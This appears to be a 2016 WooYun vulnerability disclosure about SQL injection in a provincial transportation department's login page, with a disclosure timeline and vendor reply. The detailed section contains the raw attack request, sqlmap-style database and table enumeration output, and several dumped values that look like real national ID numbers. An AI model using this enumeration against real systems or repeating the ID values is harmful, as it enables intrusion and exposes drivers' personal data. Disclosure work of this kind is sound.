Vulnerability summary

Defect ID: wooyun-2016-0182877

Title: SQL injection in a provincial Department of Transportation system exposes sensitive information on 1.9 million drivers

Affected vendor: a provincial Department of Transportation

Reporter: 路人甲

Submitted: 2016-03-10 11:16

Fixed: 2016-04-24 14:55

Published: 2016-04-24 14:55

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 10

Status: handed over to a third-party partner organisation (First Research Institute of the Ministry of Public Security, 公安部一所) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2016-03-10: Details sent to the vendor; awaiting vendor handling
2016-03-10: Vendor confirmed; details disclosed to the vendor only
2016-03-20: Details disclosed to core white hats and relevant domain experts
2016-03-30: Details disclosed to regular white hats
2016-04-09: Details disclosed to intern white hats
2016-04-24: Details disclosed to the public

Brief description:

As titled.

Detailed description:

[masked region]
*****/Login*****


SQL injection

POST /login.aspx HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer:
[masked region]
*****.*******


Content-Length: 136
Content-Type: application/x-www-form-urlencoded
User-Agent: Googlebot/2.1 (+http://**.**.**.**/bot.html)
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Host:

[masked region]
*****.*******


Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
btnLogin=%b5%c7%c2%bd&tbxName=1111oy&tbxPass=g00dPa%24%24w0rD&txt_ID=&__VIEWSTATE=/wEPDwULLTE5MjUyMzM4MzN*******P3Pkmk9Z*****


available databases [27]:
[*] CTXSYS
[*] HBYGJORA
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TEMP
[*] TXL
[*] WKSYS
[*] WMSYS
[*] XDB


Database: HBYGJORA
[79 tables]
+-------------+
| AAAAA |
| AP_ARCHIVES |
| AP_DRIVER |
| AP_FIXING |
| AP_FLOW |
| AP_FLOWSTEP |
| AP_LATTER |
| AP_LATTERMX |
| AP_LIB |
| AP_LINE |
| AP_MANAGE |
| AP_PRINT |
| AP_SDHZ |
| AP_VEHICLE |
| AP_WORKDAY |
| AP_WORKFLOW |
| CLJCDA |
| CYHBZJL |
| CYPXKSCJ |
| CYRYDA |
| CYRYPXDA |
| CYTJ_YGC |
| CYTJ_YGJ |
| FBTZ |
| GSNR |
| H_BZJL |
| H_DZJL |
| H_GHJL |
| H_GXJL |
| H_SYJL |
| KH_CYRY |
| KH_CYZGZ |
| KH_CYZGZJY |
| KH_CYZGZKH |
| KH_JSYWZJL |
| KH_WSWZJL |
| LIB_BCLB |
| LIB_CLLX_DJ |
| LIB_CLQD |
| LIB_CYLB |
| LIB_CYSQZL |
| LIB_JSYFZ |
| LIB_JYFW |
| LIB_JYFWFL |
| LIB_RYLB |
| LIB_WXCYLB |
| LIB_XLJB1 |
| LIB_XZQH |
| LIB_ZJCX |
| M_GLDW |
| PDF_XK |
| PHY_MXB |
| PHY_TJB |
| PKY_MXB |
| PKY_TJB |
| PRINT_LOG |
| PZ_FF |
| PZ_KC |
| PZ_SY |
| S_ZJBHB |
| S_ZJBM |
| S_ZJCSB |
| TYCLDA |
| TYYHDA |
| USERPURVIEW |
| W_CHARTLIB |
| W_GLLBS |
| W_IDFORMAT |
| W_LIBITEMS |
| W_LIBTITLES |
| W_LIB_JWPDB |
| W_MENU |
| W_RPTBILL |
| W_RPTDOC |
| XLDA |
| YHDA |
| YH_BHZJL |
| YH_NSJL |
| Z |
+-------------+


Database: HBYGJORA
+----------+---------+
| Table | Entries |
+----------+---------+
| KH_CYZGZ | 1905179 |
+----------+---------+


[11:07:08] [INFO] fetching columns 'SFZH' for table 'KH_CYZGZ' in database 'HBYGJORA'
[11:07:08] [INFO] the SQL query used returns 1 entries
[11:07:08] [INFO] resumed: SFZH
[11:07:08] [INFO] resumed: VARCHAR2
[11:07:08] [INFO] fetching entries of column(s) 'SFZH' for table 'KH_CYZGZ' in database 'HBYGJORA'
[11:07:08] [INFO] resumed: 133024600109361
[11:07:08] [INFO] resumed: 133026540725361
[11:07:08] [INFO] resumed: 133023550627527
[11:07:08] [INFO] resumed: 133001541201001
[11:07:08] [INFO] resumed: 13302819580815141X
[11:07:08] [INFO] resumed: 13302419620427201x

Proof of vulnerability:

(the same table list, row count and column dump as shown in the detailed description above)


Recommended fix:

Filter the input.

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 10

Confirmed: 2016-03-10 14:55

Vendor reply:

Thank you very much!
The vulnerability you submitted has been verified and will be fixed as soon as possible.

Latest status:

None yet